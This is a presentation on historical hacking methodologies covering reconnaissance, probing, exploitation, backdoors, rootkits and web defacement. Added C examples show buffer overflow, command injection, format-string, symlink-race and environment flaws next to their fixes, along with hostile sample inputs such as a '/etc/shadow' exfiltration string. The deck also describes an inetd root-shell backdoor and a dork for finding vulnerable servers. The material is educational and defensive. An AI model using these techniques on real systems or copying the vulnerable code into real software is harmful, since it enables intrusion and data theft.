Hacking Methodologies
An overview of historical hacking approaches
Johnny Long
http://johnny.ihackstuff.com
[email protected]
Varied Approaches
"Old School": Slow, careful, precise, invasive
"Pros": Fast, careful, precise, sometimes invasive
"Skript Kiddies": Slow, reckless, imprecise, invasive
"Defacers": Fast, reckless, precise, mildly invasive
Old school
For years, information security pundits have followed and believed in a "hacking methodology" which described the steps a hacker classically followed when performing an attack.
That methodology consists of the following basic steps:
Information Gathering
Probe
Attack
Advancement
Entrenchment
Infiltration/Extraction
Old School: Information Gathering
Decide and discover which targets to attack
Often begin with a specific network or a specific company
Whois, nslookup queries
samspade.org
Search engines ("googlescanning")
Old School: Probe
Scan specific targets for vulnerabilities
Search sweeping ranges of ports with a portscan (nmap)
Grab details such as service versions from the discovered ports, aka "banner grabbing" (netcat)
NT: Connect to and enumerate information from NetBIOS (enum)
Search the Internet for vulnerabilities based on the versions of software found on targets
Old School: Probe
NMAP (http://www.insecure.org/nmap)
Superscan (http://www.webattack.com/get/superscan.shtml)
Nessus (http://www.nessus.org)
Whisker (http://sourceforge.net/projects/whisker/)
Netcat (http://www.atstake.com/research/tools/)
Enum (http://razor.bindview.com/tools/index.shtml)
THC-Probe (http://www.thehackerschoice.com/download.php?t=r&d=probe-4.1.tar.gz)
Old School: Probe
Nmap is used to scan the ports of the target system. Using the -O option also reports Nmap's guess at the operating system of the target.
Some services listen behind RPC rather than on a fixed well-known port; rpcinfo -p against the target lists the registered programs and the ports they were assigned.
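The "banner grabbing" half of the Probe step, as an added example rather than code from the slides: connect to a port, let the service announce itself (SMTP, FTP and SSH speak first; HTTP waits to be asked), then pull a product/version pair out of the reply so it can be searched for in the vulnerability databases. The parsing rule is a heuristic for the common banner shapes, not Nmap's fingerprint database, and the sample banners in the checks are constructed.

```c
/* banner_grab.c: banner grabbing for the Probe step. Added example for
 * this page, not code from the slides. parse_banner() is a heuristic
 * for common banner shapes; sample banners are constructed. */
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>
#include <unistd.h>
#include <netdb.h>
#include <sys/socket.h>
#include <sys/select.h>
#include <sys/time.h>

/* "8.11.6", "1.3.11", "3.4p1": a leading digit and a dot. */
static int looks_like_version(const char *s)
{
    return isdigit((unsigned char)s[0]) && strchr(s, '.') != NULL;
}

/* Handles "Name/1.2.3", "Name_1.2.3", "SSH-2.0-Name_1.2" and "Name 1.2.3".
 * Returns 1 and fills product/version, or 0 if nothing version-like is seen. */
int parse_banner(const char *banner, char *product, size_t plen,
                 char *version, size_t vlen)
{
    char buf[512], *prev = NULL, *tok;
    snprintf(buf, sizeof buf, "%s", banner);
    for (tok = strtok(buf, " \t\r\n"); tok; tok = strtok(NULL, " \t\r\n")) {
        if (strncmp(tok, "HTTP/", 5) == 0) continue;   /* status line, not the server */
        char *sep = strpbrk(tok, "/_");
        if (sep && !isdigit((unsigned char)tok[0]) && looks_like_version(sep + 1)) {
            *sep = '\0';                                /* "Apache/1.3.11" -> "Apache" */
            char *dash = strrchr(tok, '-');
            if (strncmp(tok, "SSH-", 4) == 0 && dash)   /* "SSH-2.0-OpenSSH" -> "OpenSSH" */
                tok = dash + 1;
            snprintf(product, plen, "%s", tok);
            snprintf(version, vlen, "%.*s", (int)strcspn(sep + 1, "/;)"), sep + 1);
            return 1;
        }
        if (prev && looks_like_version(tok)) {          /* "Sendmail 8.11.6/8.11.6;" */
            snprintf(product, plen, "%s", prev);
            snprintf(version, vlen, "%.*s", (int)strcspn(tok, "/;)"), tok);
            return 1;
        }
        prev = tok;
    }
    return 0;
}

/* Does the banner parse to exactly this product/version pair? */
int banner_is(const char *banner, const char *prod, const char *ver)
{
    char p[64], v[64];
    return parse_banner(banner, p, sizeof p, v, sizeof v) == 1 &&
           strcmp(p, prod) == 0 && strcmp(v, ver) == 0;
}

/* Wait up to timeout_ms for data: bytes read, 0 on timeout, -1 on error. */
static int wait_read(int fd, int timeout_ms, char *out, size_t outlen)
{
    fd_set rf;
    struct timeval tv = { timeout_ms / 1000, (timeout_ms % 1000) * 1000 };
    FD_ZERO(&rf);
    FD_SET(fd, &rf);
    int r = select(fd + 1, &rf, NULL, NULL, &tv);
    if (r <= 0) return r;
    ssize_t n = recv(fd, out, outlen - 1, 0);
    if (n < 0) return -1;
    out[n] = '\0';
    return (int)n;
}

/* Bytes of banner received, 0 if the service never spoke, -1 on connect failure. */
int grab_banner(const char *host, const char *port, int timeout_ms,
                char *out, size_t outlen)
{
    struct addrinfo hints, *res, *ai;
    int fd = -1;
    memset(&hints, 0, sizeof hints);
    hints.ai_socktype = SOCK_STREAM;
    if (getaddrinfo(host, port, &hints, &res) != 0) return -1;
    for (ai = res; ai; ai = ai->ai_next) {
        fd = socket(ai->ai_family, ai->ai_socktype, ai->ai_protocol);
        if (fd >= 0 && connect(fd, ai->ai_addr, ai->ai_addrlen) == 0) break;
        if (fd >= 0) close(fd);
        fd = -1;
    }
    freeaddrinfo(res);
    if (fd < 0) return -1;
    int n = wait_read(fd, timeout_ms, out, outlen);
    if (n == 0) {                                       /* HTTP waits for the client */
        const char *probe = "HEAD / HTTP/1.0\r\n\r\n";
        if (send(fd, probe, strlen(probe), 0) > 0)
            n = wait_read(fd, timeout_ms, out, outlen);
    }
    close(fd);
    return n;
}

int main(int argc, char **argv)
{
    char banner[1024], p[64], v[64];
    if (argc != 3) { fprintf(stderr, "usage: %s host port\n", argv[0]); return 2; }
    int n = grab_banner(argv[1], argv[2], 3000, banner, sizeof banner);
    if (n <= 0) { fprintf(stderr, "no banner (%d)\n", n); return 1; }
    printf("raw: %s\n", banner);
    if (parse_banner(banner, p, sizeof p, v, sizeof v))
        printf("product=%s version=%s\n", p, v);       /* the pair to search BIDs for */
    return 0;
}
```

Build with cc and run as banner_grab host port against a system you are authorized to test; the product/version pair it prints is what the next step ("search the Internet for vulnerabilities based on versions") keys on. A service that prints a banner but hides the version will parse to nothing, which is itself worth noting as a hardening signal.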
Old School: Attack
Gather compatible exploits
Compile exploits (if required)
Launch exploits against targets
Modify parameters, re-launch exploits (if required)
Old School: Attack
There are many different types of attacks, which can be broken down into several classifications.
The attacks are performed from one of two perspectives:
Local: The attacker has access to a command prompt or has gained the ability to execute commands on the target
Remote: The attacker exploits the target box without first gaining access to a command shell
Attacks: Buffer Overflow
Aka the "Boundary Condition Error": stuff more data into a buffer than it can hold. The excess overwrites adjacent memory (on the stack, typically the saved return address), so attacker-supplied data "falls" into a precise location and is executed by the system.
Local overflows are executed while logged into the target system
Remote overflows are executed by processes running on the target that the attacker "connects" to
Result: Commands are executed at the privilege level of the overflowed program
Example: snmpXdmid overflow (Solaris 2.6, 7 and 8)
http://www.securityfocus.com/bid/2417
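The remote-overflow shape described above, as an added example that is not code from the slides: a daemon reads a length-prefixed name from a socket into a fixed stack buffer, bounding the copy by the packet rather than by the buffer. The wire format (2-byte big-endian length, then the name) and all function names are made up for the demonstration; the hardened handler beside it bounds by the destination and rejects rather than silently truncating.

```c
/* hello_overflow.c: the remote-overflow shape from the slide, next to
 * its fix. Added example, not from the slides. The wire format is
 * made up: a 2-byte big-endian length followed by a client name, as a
 * daemon on the target might read it from an inetd-served socket. */
#include <stdio.h>
#include <string.h>
#include <stdint.h>
#include <stddef.h>

#define NAME_MAX_LEN 64

/* Vulnerable: the only check is against the packet, so a client that
 * sends length 500 and 500 bytes walks memcpy straight past 'name' into
 * whatever the compiler placed above it (saved frame pointer, return
 * address). With a crafted payload the function "returns" into
 * attacker data, running as whatever user the daemon runs as. Never
 * called with an oversized packet below: that is undefined behaviour,
 * not a demonstration. */
int handle_hello_vulnerable(const uint8_t *pkt, size_t pktlen)
{
    char name[NAME_MAX_LEN];
    if (pktlen < 2) return -1;
    size_t len = ((size_t)pkt[0] << 8) | pkt[1];   /* attacker-controlled */
    if (len > pktlen - 2) return -1;                /* bounds the source, not the destination */
    memcpy(name, pkt + 2, len);                     /* overflow once len > 63 */
    name[len] = '\0';
    return (int)strlen(name);
}

/* Hardened: the destination size is the bound. Reject rather than
 * silently truncate, so the caller can log the attempt. */
int handle_hello_safe(const uint8_t *pkt, size_t pktlen, char *out, size_t outlen)
{
    if (pktlen < 2 || outlen == 0) return -1;
    size_t len = ((size_t)pkt[0] << 8) | pkt[1];
    if (len > pktlen - 2) return -1;                /* short packet: the length lies */
    if (len >= outlen) return -2;                   /* no room for name + terminator */
    memcpy(out, pkt + 2, len);
    out[len] = '\0';
    return (int)len;
}

/* Build a packet whose name field is n bytes of 'A'. Returns packet size, 0 on error. */
size_t build_hello(uint8_t *pkt, size_t cap, size_t n)
{
    if (cap < 2 + n || n > 0xFFFF) return 0;
    pkt[0] = (uint8_t)(n >> 8);
    pkt[1] = (uint8_t)(n & 0xFF);
    memset(pkt + 2, 'A', n);
    return 2 + n;
}

/* Result of the hardened handler for an honest packet with an n-byte name. */
int safe_result_for_name_length(size_t n)
{
    uint8_t pkt[2 + 1024];
    char out[NAME_MAX_LEN];
    size_t sz = build_hello(pkt, sizeof pkt, n);
    return sz ? handle_hello_safe(pkt, sz, out, sizeof out) : -1;
}

/* Result for a packet whose header claims 500 bytes but carries only 10. */
int safe_result_for_lying_length(void)
{
    uint8_t pkt[2 + 10];
    char out[NAME_MAX_LEN];
    build_hello(pkt, sizeof pkt, 10);
    pkt[0] = 500 >> 8;
    pkt[1] = 500 & 0xFF;
    return handle_hello_safe(pkt, sizeof pkt, out, sizeof out);
}

int main(void)
{
    uint8_t pkt[2 + 16];
    size_t sz = build_hello(pkt, sizeof pkt, 16);
    printf("vulnerable handler, benign 16-byte name: %d\n", handle_hello_vulnerable(pkt, sz));
    printf("safe handler, 63 bytes: %d\n", safe_result_for_name_length(63));
    printf("safe handler, 64 bytes: %d (rejected)\n", safe_result_for_name_length(64));
    printf("safe handler, 500 bytes: %d (rejected)\n", safe_result_for_name_length(500));
    printf("lying length header: %d (rejected)\n", safe_result_for_lying_length());
    return 0;
}
```

The two handlers differ in one comparison. The vulnerable one asks "is the length consistent with the packet?", which an attacker who built the packet can always satisfy; the safe one asks "does it fit where I am about to put it?", which only the program can answer.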
Attacks: Input Validation
A process does not "strip" or reject input before processing it, e.g. special shell characters such as semicolon and pipe symbols
An attacker provides data in unexpected fields, e.g. SQL database parameters
Attacks: Input Validation
Example: Trillian IRC Module Format String Vulnerability (http://online.securityfocus.com/bid/5388)
"A format string vulnerability has been reported in the Trillian IRC module. An attacker can exploit this vulnerability by enticing a user to join a channel with a malicious channel name (e.g. #%n%n%n). An attacker in control of a malicious server may exploit vulnerable clients who have connected."
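Both failures on these two slides, each beside its hardened form, as an added example that is not code from the slides: a hostname with shell metacharacters reaching a shell command line, and attacker text used as a printf format string (the shape of the Trillian "#%n%n%n" channel name). The ping wrapper and the join logger are made up for the demonstration.

```c
/* input_validation.c: the two failures these slides describe, each
 * beside its hardened form. Added example, not from the slides.
 *  1. Shell metacharacters ("; and |") reaching system() through a
 *     user-supplied hostname.
 *  2. A format-string bug: attacker text used as the format argument,
 *     the shape of the Trillian "#%n%n%n" channel name. */
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>
#include <unistd.h>
#include <sys/wait.h>

/* Allowlist, not denylist: letters, digits, '-' and '.', first char
 * alphanumeric (so it cannot be parsed as an option), RFC-sized.
 * Stripping only ';' and '|' would miss backticks, $(...), newlines. */
int is_valid_hostname(const char *h)
{
    size_t n = strlen(h);
    if (n == 0 || n > 253 || !isalnum((unsigned char)h[0])) return 0;
    for (size_t i = 0; i < n; i++) {
        unsigned char c = (unsigned char)h[i];
        if (!isalnum(c) && c != '-' && c != '.') return 0;
    }
    return 1;
}

/* Vulnerable: "host; cat /etc/shadow | mail x@y" becomes a shell
 * command line and the shell does exactly what it says. This only
 * builds the command so the result can be shown; it does not run it. */
int build_ping_command_vulnerable(char *cmd, size_t len, const char *host)
{
    return snprintf(cmd, len, "ping -c 1 %s", host);
}

/* Hardened: validate, then exec without a shell so there is nothing to
 * parse. The hostname is a single argv element no matter what it holds. */
int ping_safe(const char *host)
{
    if (!is_valid_hostname(host)) return -1;
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        execlp("ping", "ping", "-c", "1", host, (char *)NULL);
        _exit(127);
    }
    int status;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

/* Vulnerable: the channel name is the format string. "%x%x%x" prints
 * stack words, "%n" writes a byte count to an address taken from the
 * stack, which is how a name like "#%n%n%n" becomes code execution. */
void log_join_vulnerable(char *out, size_t outlen, const char *channel)
{
    snprintf(out, outlen, channel);                 /* BUG: data used as format */
}

/* Hardened: constant format string, user data only ever as an argument. */
void log_join_safe(char *out, size_t outlen, const char *channel)
{
    snprintf(out, outlen, "joined %s", channel);
}

/* The safe logger reproduces the channel name byte for byte, '%'
 * sequences included, instead of interpreting them. */
int safe_log_is_literal(const char *channel)
{
    char buf[256];
    log_join_safe(buf, sizeof buf, channel);
    return strncmp(buf, "joined ", 7) == 0 && strcmp(buf + 7, channel) == 0;
}

int main(void)
{
    const char *inputs[] = { "mail.example.com", "host;id", "a|b", "$(id)", "-c" };
    char cmd[256], line[256];
    for (size_t i = 0; i < 5; i++)
        printf("%-18s valid=%d\n", inputs[i], is_valid_hostname(inputs[i]));
    build_ping_command_vulnerable(cmd, sizeof cmd, "host; id");
    printf("shell would see: %s\n", cmd);
    log_join_vulnerable(line, sizeof line, "#linux");   /* benign name only */
    log_join_safe(line, sizeof line, "#%n%n%n");
    printf("safe log line: %s\n", line);
    return 0;
}
```

Note the order in ping_safe: the allowlist runs first, and the exec path then has no shell at all. Either measure alone is weaker; validation with a denylist misses characters you did not think of, and exec-without-shell still passes "-c" style arguments to the program unless the first character is constrained.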
Attacks: Race Conditions
An attacker forces an action during a sensitive time window between two operations:
A program checks to make sure output file "/tmp/temp_output" does not exist
The program wanders off and does other stuff...
An attacker quickly creates a symlink from "/tmp/temp_output" to "/etc/shadow"
The program writes to "/tmp/temp_output", which clobbers "/etc/shadow"
Example: RedHat Linux diskcheck (http://online.securityfocus.com/bid/2050)
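The /tmp symlink race above, reproduced as an added example that is not code from the slides: the check-then-open version next to an atomic create, each run against an attacker-planted symlink in a private scratch directory. The directory, file names and contents are constructed for the demo; nothing outside that directory is touched. The demo uses the dangling-link variant (the link points at a file that does not exist yet, so the "does it exist?" check passes); with a link to an existing target the same window lies between the check and the open.

```c
/* tmp_race.c: the /tmp symlink race from the slide. Added example, not
 * from the slides; directory, file names and contents are constructed.
 * A program wants to create "temp_output". Between its "does it
 * exist?" check and its open, an attacker plants a symlink there. */
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/stat.h>

/* Vulnerable: two system calls with a window between them. access()
 * follows symlinks, so a link pointing at a not-yet-existing path
 * reports "does not exist"; fopen("w") then follows the link too and
 * creates or truncates whatever it points at, with this program's
 * privileges. Pointed at an existing /etc/shadow, that is the clobber
 * on the slide. */
int create_output_vulnerable(const char *path, const char *data)
{
    if (access(path, F_OK) == 0) return -1;         /* "safe, nothing there" */
    /* ... the program wanders off; the attacker's symlink lands here ... */
    FILE *f = fopen(path, "w");
    if (!f) return -1;
    fputs(data, f);
    fclose(f);
    return 0;
}

/* Hardened: one system call. O_EXCL makes open() fail with EEXIST if
 * anything, symlink included, already has that name; O_NOFOLLOW refuses
 * to traverse a link in any case; 0600 keeps the output private.
 * mkstemp() applies the same flags with an unguessable name. */
int create_output_safe(const char *path, const char *data)
{
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
    if (fd < 0) return -1;                          /* errno == EEXIST: someone was here */
    ssize_t want = (ssize_t)strlen(data);
    ssize_t got = write(fd, data, (size_t)want);
    close(fd);
    return got == want ? 0 : -1;
}

/* Run the attack against one implementation. Returns 1 if the program
 * ended up writing to the attacker-chosen path, 0 if it refused, -1 on
 * setup failure. A fresh private directory stands in for /tmp. */
static int symlink_attack_succeeds(int (*create)(const char *, const char *))
{
    char dir[] = "/tmp/raceXXXXXX", out[96], target[96];
    struct stat st;
    if (!mkdtemp(dir)) {                            /* no /tmp? use the cwd */
        strcpy(dir, "./raceXXXXXX");
        if (!mkdtemp(dir)) return -1;
    }
    snprintf(out, sizeof out, "%s/temp_output", dir);      /* the program's output file */
    snprintf(target, sizeof target, "%s/planted", dir);    /* stands in for /etc/shadow */
    if (symlink(target, out) != 0) return -1;              /* the attacker's move */
    create(out, "harmless program output\n");              /* the program's write */
    int hit = stat(target, &st) == 0;                      /* did the write land on the target? */
    unlink(target);
    unlink(out);
    rmdir(dir);
    return hit;
}

int symlink_attack_succeeds_vulnerable(void) { return symlink_attack_succeeds(create_output_vulnerable); }
int symlink_attack_succeeds_safe(void)       { return symlink_attack_succeeds(create_output_safe); }

int main(void)
{
    printf("check-then-open: attacker's path written = %d\n", symlink_attack_succeeds_vulnerable());
    printf("O_CREAT|O_EXCL|O_NOFOLLOW: attacker's path written = %d\n", symlink_attack_succeeds_safe());
    return 0;
}
```

The fix is not "check faster"; no amount of speed closes a window between two system calls. It is to make the create itself refuse to succeed on a pre-existing name, which is what O_EXCL does, and to never follow a link on the output path, which is what O_NOFOLLOW does.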
Attacks: Environment Errors
An attacker makes a change to a program's environment that was not expected
For example, a program relies on the UNIX environment variable $USER to determine who is running the program
An attacker changes this value to "root" before executing the program
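The $USER example above in code, as an added example that is not from the slides: a check that believes the environment next to one that asks the kernel, with the spoof ("export USER=root") reproduced in-process so both can be compared. The function names are made up for the demonstration.

```c
/* env_user.c: the $USER check from the slide, beside the fix. Added
 * example, not from the slides. Environment variables are input the
 * caller fully controls, exactly like argv: a setuid program that
 * reads $USER to learn who invoked it can be told "root" by anyone.
 * The real and effective uid cannot be changed from a shell prompt. */
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <pwd.h>

/* Vulnerable: identity taken from the environment. */
int is_root_by_env(void)
{
    const char *user = getenv("USER");
    return user != NULL && strcmp(user, "root") == 0;
}

/* Hardened: identity taken from the kernel. The real uid answers "who
 * ran me"; a setuid-root binary has euid 0 regardless of who ran it. */
int is_root_by_uid(void)
{
    return getuid() == 0;
}

/* If a name is needed (for a log line, a home directory), derive it
 * from the uid rather than reading it back from $USER or $HOME. */
const char *invoking_user_name(char *buf, size_t len)
{
    struct passwd *pw = getpwuid(getuid());
    snprintf(buf, len, "%s", pw ? pw->pw_name : "uid-unknown");
    return buf;
}

/* Reproduce the attack in-process: export USER=root, then ask each check. */
int env_check_after_spoof(void)
{
    setenv("USER", "root", 1);       /* the attacker's "export USER=root" */
    return is_root_by_env();
}

int uid_check_after_spoof(void)
{
    setenv("USER", "root", 1);
    return is_root_by_uid();         /* unchanged by the spoof */
}

int main(void)
{
    char name[64];
    printf("before spoof: env says root=%d, kernel says root=%d (uid %u, %s)\n",
           is_root_by_env(), is_root_by_uid(), (unsigned)getuid(),
           invoking_user_name(name, sizeof name));
    printf("after  spoof: env says root=%d, kernel says root=%d\n",
           env_check_after_spoof(), uid_check_after_spoof());
    return 0;
}
```

The same reasoning applies to every other variable a privileged program consults: PATH, IFS and the library-loader variables are set by the caller too, which is why setuid programs reset them rather than trust them.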
Attacks: Weak Passwords
Accounts with weak passwords are guessed by a remote attacker
Accounts with weak passwords are cracked by an attacker with access to a password database
THC-HYDRA Login Hacker (http://www.thehackerschoice.com/releases.php)
Attack: Exploit Sites
SecurityFocus (http://www.securityfocus.com)
Packetstorm (http://packetstormsecurity.org)
New Order (http://neworder.box.sk/)
Hack in the Box (http://www.hackinthebox.org/)
phreak.org (http://www.phreak.org/archives/exploits/unix/)
Old School: Attack phases
The Attack is most often broken into several phases (perhaps running cyclically):
Locating Exploits
Getting Exploits
Modification of Exploits
Building Exploits
Testing Exploits
Running Exploits
Old School: Locating exploits
Old School: Getting Exploits
The 'wget' program downloads the exploit to the attacker's machine.
Old School: Modifying exploit
Most exploits will not work across all platforms, so modifications generally need to be made. In this case, -lsocket (a Solaris-only link flag) won't work and is removed from the build line so the exploit compiles on our RedHat 7.2 attack box.
Old School: Building Exploit
Some exploits come complete with a Makefile, so a simple 'make' command is all that's required to build the exploit.
The make command successfully produces the exploit, in this case 'automountdexp'.
Old School: Testing Exploit
The '-h' parameter shows the usage for this exploit.
Old School: Attack: Running Exploit
This attack executes commands on the target (a Solaris 2.5.1 box) as root. In this case, the attacker drops a line into /etc/inet/inetd.conf and a line into /etc/services. When the system is restarted (or inetd is restarted) a listening root shell is opened on port 31337.
Old School: Attack: Success!
The attacker connects to port 31337 on the target and is greeted with a root prompt.
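The defender's view of the attack just shown, as an added example that is not from the slides: a small audit of inetd.conf and /etc/services that flags any service handing out a shell and reports which port it answers on. Both config fragments are constructed, the exact lines the exploit wrote are not on the page, and the planted service name nfsmon is an assumption.

```c
/* inetd_audit.c: the defender's side of the slide's attack. The exploit
 * added a service to /etc/inet/inetd.conf and a matching port to
 * /etc/services so that a root shell answers on 31337. Added example,
 * not from the slides; both config fragments below are constructed. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>

/* Copy the line starting at p into out; return the start of the next
 * line, or NULL when the text is exhausted. */
static const char *next_line(const char *p, char *out, size_t outlen)
{
    if (!p || !*p) return NULL;
    const char *eol = strchr(p, '\n');
    size_t len = eol ? (size_t)(eol - p) : strlen(p);
    snprintf(out, outlen, "%.*s", (int)len, p);
    return eol ? eol + 1 : p + len;
}

/* Split a config line on whitespace (in place). 0 for blank/comment lines. */
static int split_fields(char *line, char **f, int max)
{
    int n = 0;
    while (*line && isspace((unsigned char)*line)) line++;
    if (*line == '#' || *line == '\0') return 0;
    for (char *t = strtok(line, " \t\r\n"); t && n < max; t = strtok(NULL, " \t\r\n"))
        f[n++] = t;
    return n;
}

/* inetd.conf fields: service socket proto wait/nowait user server [args]
 * Returns 2 for a shell served as root, 1 for a shell served as any
 * other user, 0 otherwise. "Shell" = server basename is a known shell,
 * or any argument is -i. Copies the service name into svc if given. */
int inetd_line_severity(const char *line, char *svc, size_t svclen)
{
    char buf[512], *f[16];
    snprintf(buf, sizeof buf, "%s", line);
    int n = split_fields(buf, f, 16);
    if (n < 6) return 0;
    if (svc && svclen) snprintf(svc, svclen, "%s", f[0]);
    const char *base = strrchr(f[5], '/');
    base = base ? base + 1 : f[5];
    int shell = !strcmp(base, "sh") || !strcmp(base, "bash") ||
                !strcmp(base, "ksh") || !strcmp(base, "csh");
    for (int i = 6; i < n && !shell; i++)
        if (!strcmp(f[i], "-i")) shell = 1;
    if (!shell) return 0;
    return strcmp(f[4], "root") == 0 ? 2 : 1;
}

/* Port for a service name in /etc/services text ("name port/proto"), -1 if absent. */
int port_for_service(const char *services, const char *name)
{
    char line[256], *f[4];
    for (const char *p = services; (p = next_line(p, line, sizeof line)); )
        if (split_fields(line, f, 4) >= 2 && strcmp(f[0], name) == 0)
            return atoi(f[1]);                          /* "31337/tcp" -> 31337 */
    return -1;
}

/* Print every shell-like inetd entry with its port; return the count.
 * *root_port receives the port of the last root shell found, or -1. */
int audit_inetd(const char *conf, const char *services, int *root_port)
{
    char line[512], svc[64];
    int findings = 0;
    if (root_port) *root_port = -1;
    for (const char *p = conf; (p = next_line(p, line, sizeof line)); ) {
        int sev = inetd_line_severity(line, svc, sizeof svc);
        if (!sev) continue;
        int port = port_for_service(services, svc);
        printf("[%s] %s on port %d: %s\n", sev == 2 ? "ROOT SHELL" : "shell", svc, port, line);
        if (sev == 2 && root_port) *root_port = port;
        findings++;
    }
    return findings;
}

/* Constructed samples; "nfsmon" is the planted entry, not a real service. */
static const char SAMPLE_INETD_CONF[] =
    "# /etc/inet/inetd.conf (constructed)\n"
    "ftp     stream tcp nowait root   /usr/sbin/in.ftpd    in.ftpd\n"
    "telnet  stream tcp nowait root   /usr/sbin/in.telnetd in.telnetd\n"
    "finger  stream tcp nowait nobody /usr/sbin/in.fingerd in.fingerd\n"
    "nfsmon  stream tcp nowait root   /bin/sh              sh -i\n";
static const char SAMPLE_SERVICES[] =
    "ftp     21/tcp\ntelnet  23/tcp\nfinger  79/tcp\nnfsmon  31337/tcp\n";

int sample_findings(void)        { int port; return audit_inetd(SAMPLE_INETD_CONF, SAMPLE_SERVICES, &port); }
int sample_root_shell_port(void) { int port; audit_inetd(SAMPLE_INETD_CONF, SAMPLE_SERVICES, &port); return port; }

int main(void) { return sample_findings() ? 1 : 0; }
```

A name-based check like this catches the lazy version of the backdoor; an attacker who copies /bin/sh to /usr/sbin/in.nfsmond defeats it, so in practice the audit is paired with a diff of both files against a known-good copy and with a listener inventory (the slide's netstat/nmap from the outside) to catch the port itself.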
Old School: Advancement (optional)
If needed, gain further access to targets by further exploitation
Trojans
Local Exploits
The advancement phase will somewhat mirror the Attack phases unless the attacker has already tested the exploits
Old School: Entrenchment
Modify targets to ensure future access
Backdoors
Rootkits
Entrenchment: Backdoors
Linux
Non-listening backdoor programs = no listening port! (The backdoor sniffs for a trigger packet sequence instead of binding a socket, so netstat shows nothing.)
SAdoor (http://cmn.listprojects.darklab.org/)
Cd00r (http://www.phenoelit.de/stuff/cd00rdescr.html)
NT/2K
Fake GINA: username and password interceptor (http://www.rootkit.com/projects/ginatroj/)
NTKap: removes NT ACL protection (http://www.rootkit.com/projects/ntkap/)
Entrenchment: Rootkits
Linux
LRK5 (http://online.securityfocus.com/data/tools/lrk5.src.tar.gz)
ADORE (http://online.securityfocus.com/tools/1490)
KNARK (http://online.securityfocus.com/tools/1163)
NT
NT Rootkit (http://www.rootkit.com/projects/ntroot/)
NULL.SYS (http://www.rootkit.com/projects/nullsys/)
Old School: Infiltration/Extraction
Install sniffers to monitor network traffic, gather usernames/passwords
Extract data from compromised systems
Compromise neighboring targets based on captured data or trust relationships
Professionals
Professional hackers, or ethical hackers, tend to follow the following methodology:
Information Gathering
Probe
Attack
Advancement
Infiltration/Extraction
Professionals
Most often, professional ethical hackers rely on "Vulnerability Scanners" to perform their jobs:
Nessus
Retina by eEye
Network Associates CyberCop
H.E.A.T.
Internet Security Systems Internet Scanner
(see http://www.networkcomputing.com/1201/1201f1b1.html)
Professionals
Vulnerability Scanner Demo
"Skript Kiddies"
Skript Kiddies
Skript Kiddies, named for their annoying ability to (sometimes) successfully compromise a system using pre-written scripts, generally follow a very simple non-cyclical methodology. (See http://project.honeynet.org/papers/enemy/ for an interesting writeup on the topic.)
Exploit Selection
Target Selection
Attack
Skript Kiddies: Exploit Selection
Nearly identical to the "Old School" method of locating exploits, skript kiddies generally use search engines to locate exploits
Skript Kiddies are generally not a technically savvy lot, so exploit selection is made based on the attack platforms available (generally Windows-based) and ease of use.
Skript Kiddies: Target Selection
Most target selection involves noisy scanners, often launched from Windows platforms
An increasing number of Skript Kiddies, however, are gaining familiarity with Linux and use fairly standard tools such as nmap.
Skript Kiddies: Attack!
Unlike old-school attacks, Skript Kiddies' tools are generally pre-compiled, or written in interpreted languages such as PERL
If an exploit needs to be built, most kiddies will not be able to get it working
If a built exploit fails, a skript kiddie usually moves along to another target instead of fixing the exploit. This makes the process non-cyclical.
"Defacers"
Web Defacers
While "old school" methods are still in use, web defacers statistically own the hacking landscape
http://www.alldas.org
Profile of a web defacer
Handle: intrud3rm4n
Age: 21
Group: Leader of ISOTK (In Search of the Knowledge!)
Defacement count (8/09/02): 960 sites, 785 addresses, 175 mass defacements
My favorite defacement: http://defaced.alldas.org/mirror/2002/07/21/java.capgemini.nl/
Country of Origin: Brazil
Language: Portuguese
Favorite Hacking food: Hamburgers and Fries
Favorite Hacking Music: Metallica =)
Favorite exploit: whacking LINUX boxen
Reason for defacing: FUN
Defaced: Cap Gemini
Following web defacers
http://www.alldas.org
http://www.zone-h.com/en/defacements
http://www.delta5.com.br/mirror/
Common Web Defacement Methodology
Web Defacers, for the most part, have a slightly different methodology. Instead of basing the exploit on the target, the target is selected based on its vulnerability to the exploit!
The web defacement methodology (again, often cyclical) is generally as follows:
Exploit Selection
Target Selection
Attack
Defacement
Web Defacement
Amateur defacers usually stick with one exploit and one target platform.
Defacer’s Exploit Selection
An attacker’s level of comfort with an Operating System will often decide the types of exploits used
UNIX-based attackers often opt for C-based remote overflows
Windows-based attackers often opt for perl-based remote overflows, Visual Basic tools, or command-line "net" commands
Attackers with only browser-based experience, or simplistic attackers seeking privacy through proxies, will opt for URL-based attacks such as the IIS UNICODE or DECODE directory-traversal bugs, FrontPage exploits, or PHP-Nuke attacks
Defacer’s Search for Exploits
Often an amateur defacer will monitor popular security sites (such as SecurityFocus) to select exploits
Defacer’s Target Selection
Armed with an exploit, most web defacers now seek vulnerable targets using various methods:
Web searching: Netcraft, Netstat, Google
Host scanning: Nmap, custom scanners
Defacer’s Target Selection: Web Searches
http://www.netcraft.com
Using search engines to locate vulnerable servers is a very interesting and fruitful technique which hasn’t been explored in great detail.
http://johnny.ihackstuff.com/security/googledorks.shtml
Google query: intitle:"Index of" "Apache 1.3.11"
Here, Apache 1.3.11 servers are located through creative use of the Google search engine: the query matches directory-listing pages whose server-signature footer names the exact version.
http://www.netstat.ru
Defacer’s Target Selection: Host Scanning
Nmap’s OS detection feature (-O) provides a decent guess as to the operating system of the target
http://packetstormsecurity.com provides a great resource for custom vulnerability scanners.
Defacer’s Attack
Once the target and the exploit are selected, the attacker launches the attack against the server.
If the attack fails, the attacker will often modify the attack and try again.
Questions?